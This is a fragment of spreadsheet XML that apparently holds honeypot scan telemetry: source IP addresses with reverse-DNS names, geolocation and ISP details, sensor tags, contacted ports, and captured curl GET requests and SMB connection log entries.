    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;8222&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b7e:65f1</t>
  </si>
  <si>
    <t>c94fa2bee2461331a081a35eb8795757</t>
  </si>
  <si>
    <t>146.90.6.169</t>
  </si>
  <si>
    <t>NA&amp;&amp;169.6.90.146.dyn.plus.net</t>
  </si>
  <si>
    <t>London (Colindale)</t>
  </si>
  <si>
    <t>NW9 6HP</t>
  </si>
  <si>
    <t>51.5897</t>
  </si>
  <si>
    <t>-0.249103</t>
  </si>
  <si>
    <t>6871</t>
  </si>
  <si>
    <t>PlusNet plc</t>
  </si>
  <si>
    <t>PlusNet Plc</t>
  </si>
  <si>
    <t>2011-07-11</t>
  </si>
  <si>
    <t>::ffff:925a:6a9</t>
  </si>
  <si>
    <t>397457ba25666830c6ab4a71495d6566</t>
  </si>
  <si>
    <t>113.22.239.16</t>
  </si>
  <si>
    <t>Quận Ngũ Hành Sơn</t>
  </si>
  <si>
    <t>Ngũ Hành Sơn</t>
  </si>
  <si>
    <t>8656412</t>
  </si>
  <si>
    <t>16.0162</t>
  </si>
  <si>
    <t>108.253</t>
  </si>
  <si>
    <t>::ffff:7116:ef10</t>
  </si>
  <si>
    <t>49f66f8334baa74139a283b1269bd43a</t>
  </si>
  <si>
    <t>1.34.2.141</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-34-2-141.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>80&amp;&amp;23&amp;&amp;47211&amp;&amp;47219&amp;&amp;47220&amp;&amp;47225&amp;&amp;9100&amp;&amp;23971</t>
  </si>
  <si>
    <t>::ffff:122:28d</t>
  </si>
  <si>
    <t>2015f16a303fd57571e84ecebae3a799</t>
  </si>
  <si>
    <t>125.228.37.39</t>
  </si>
  <si>
    <t>125-228-37-39.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;13719&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:2527</t>
  </si>
  <si>
    <t>3b9910fd05862f53adf132ede5fc6541</t>
  </si>
  <si>
    <t>182.60.35.7</t>
  </si>
  <si>
    <t>::ffff:b63c:2307</t>
  </si>
  <si>
    <t>2bbb98eeb595843d1a7850c8a8939eba</t>
  </si>
  <si>
    <t>117.201.178.70</t>
  </si>
  <si>
    <t>::ffff:75c9:b246</t>
  </si>
  <si>
    <t>165c8edfd9acc2f18a5f994ba408be5e</t>
  </si>
  <si>
    <t>61.3.114.242</t>
  </si>
  <si>
    <t>::ffff:3d03:72f2</t>
  </si>
  <si>
    <t>9582b12ee6eadd5a2ee5a197c78199fa</t>
  </si>
  <si>
    <t>114.33.61.109</t>
  </si>
  <si>
    <t>114-33-61-109.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;52793&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7221:3d6d</t>
  </si>
  <si>
    <t>27198590f39c694c77eeea2ddef05afb</t>
  </si>
  <si>
    <t>59.91.34.195</t>
  </si>
  <si>
    <t>::ffff:3b5b:22c3</t>
  </si>
  <si>
    <t>b36f2ce58ccca63d39fd62b156d12873</t>
  </si>
  <si>
    <t>220.132.171.103</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-171-103.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;33501&amp;&amp;80&amp;&amp;9100&amp;&amp;NA&amp;&amp;61549</t>
  </si>
  <si>
    <t>::ffff:dc84:ab67</t>
  </si>
  <si>
    <t>d02fad39130e8eae15c8077ae283bd42</t>
  </si>
  <si>
    <t>59.126.32.90</t>
  </si>
  <si>
    <t>59-126-32-90.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;44822&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7e:205a</t>
  </si>
  <si>
    <t>bf0323870da07f5721d8d17b6ba7fee8</t>
  </si>
  <si>
    <t>125.228.29.65</t>
  </si>
  <si>
    <t>125-228-29-65.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_DNS_H5&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;46996&amp;&amp;80&amp;&amp;4892&amp;&amp;40514&amp;&amp;45629&amp;&amp;56765&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:1d41</t>
  </si>
  <si>
    <t>93fde1a4d3e0a3634586220a83efa3b1</t>
  </si>
  <si>
    <t>122.117.18.160</t>
  </si>
  <si>
    <t>122-117-18-160.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_NTP_H36&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;22&amp;&amp;9100&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;123&amp;&amp;5900&amp;&amp;54336&amp;&amp;23&amp;&amp;15957</t>
  </si>
  <si>
    <t>::ffff:7a75:12a0</t>
  </si>
  <si>
    <t>3a105ffe6635c0e607bad528a034ef79</t>
  </si>
  <si>
    <t>46.237.70.115</t>
  </si>
  <si>
    <t>Pazardzhik</t>
  </si>
  <si>
    <t>728378</t>
  </si>
  <si>
    <t>4400</t>
  </si>
  <si>
    <t>42.2</t>
  </si>
  <si>
    <t>24.3333</t>
  </si>
  <si>
    <t>43205</t>
  </si>
  <si>
    <t>Bulsatcom AD</t>
  </si>
  <si>
    <t>::ffff:2eed:4673</t>
  </si>
  <si>
    <t>b558de7141d93342131ece28e48ab0d9</t>
  </si>
  <si>
    <t>125.229.241.172</t>
  </si>
  <si>
    <t>125-229-241-172.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;5900&amp;&amp;445&amp;&amp;9100&amp;&amp;389&amp;&amp;22&amp;&amp;1080&amp;&amp;40964&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:f1ac</t>
  </si>
  <si>
    <t>129412a741996f976ea2f332d32441a1</t>
  </si>
  <si>
    <t>125.228.180.175</t>
  </si>
  <si>
    <t>125-228-180-175.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;59401&amp;&amp;23&amp;&amp;NA&amp;&amp;34809&amp;&amp;34826&amp;&amp;34845&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de4:b4af</t>
  </si>
  <si>
    <t>71b3454a6549187ef735166200d9dc6f</t>
  </si>
  <si>
    <t>59.91.233.198</t>
  </si>
  <si>
    <t>::ffff:3b5b:e9c6</t>
  </si>
  <si>
    <t>1e8c129854827488f302673295c87ace</t>
  </si>
  <si>
    <t>125.229.239.144</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-239-144.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;143&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:ef90</t>
  </si>
  <si>
    <t>38c0cc635a5cc85062face2ad98bdf27</t>
  </si>
  <si>
    <t>177.223.39.134</t>
  </si>
  <si>
    <t>NA&amp;&amp;177-223-39-134.linqtelecom.com.br</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>GO</t>
  </si>
  <si>
    <t>Goiás</t>
  </si>
  <si>
    <t>Goiânia</t>
  </si>
  <si>
    <t>3462377</t>
  </si>
  <si>
    <t>-16.6786</t>
  </si>
  <si>
    <t>-49.2539</t>
  </si>
  <si>
    <t>266539</t>
  </si>
  <si>
    <t>LINQ TELECOMUNICAÇOES LTDA ME</t>
  </si>
  <si>
    <t>Linq Telecomunicacoes</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (177.223.39.134,61438)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,61504)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,53543)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,60341)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,59556)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,55438)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,55497)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,56206)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,34716)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,64205)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,64880)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,50060)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,50201)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>2017-07-07 00:00:00</t>
  </si>
  <si>
    <t>2033-07-07 00:00:00</t>
  </si>
  <si>
    <t>2024-06-06 00:00:00</t>
  </si>
  <si>
    <t>::ffff:b1df:2786</t>
  </si>
  <si>
    <t>1af7e93d18aaa05bc4134577e9b38269</t>
  </si>
  <si>
    <t>157.42.193.253</t>
  </si>
  <si>
    <t>1992-01-29</t>
  </si>
  <si>
    <t>::ffff:9d2a:c1fd</t>
  </si>
  <si>
    <t>722ddd797af8915bc95ea6076b1c275a</t>
  </si>
  <si>
    <t>188.163.94.34</t>
  </si>
  <si>
    <t>Kamianskyi Raion</t>
  </si>
  <si>
    <t>Kamianske</t>
  </si>
  <si>
    <t>709932</t>
  </si>
  <si>
    <t>48.5172</t>
  </si>
  <si>
    <t>34.6062</t>
  </si>
  <si>
    <t>KSNET-AS</t>
  </si>
  <si>
    <t>GTU network</t>
  </si>
  <si>
    <t>::ffff:bca3:5e22</t>
  </si>
  <si>
    <t>c0e71f56ddbd882477b6197a22b4e4a3</t>
  </si>
  <si>
    <t>220.133.185.18</t>
  </si>
  <si>
    <t>220-133-185-18.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
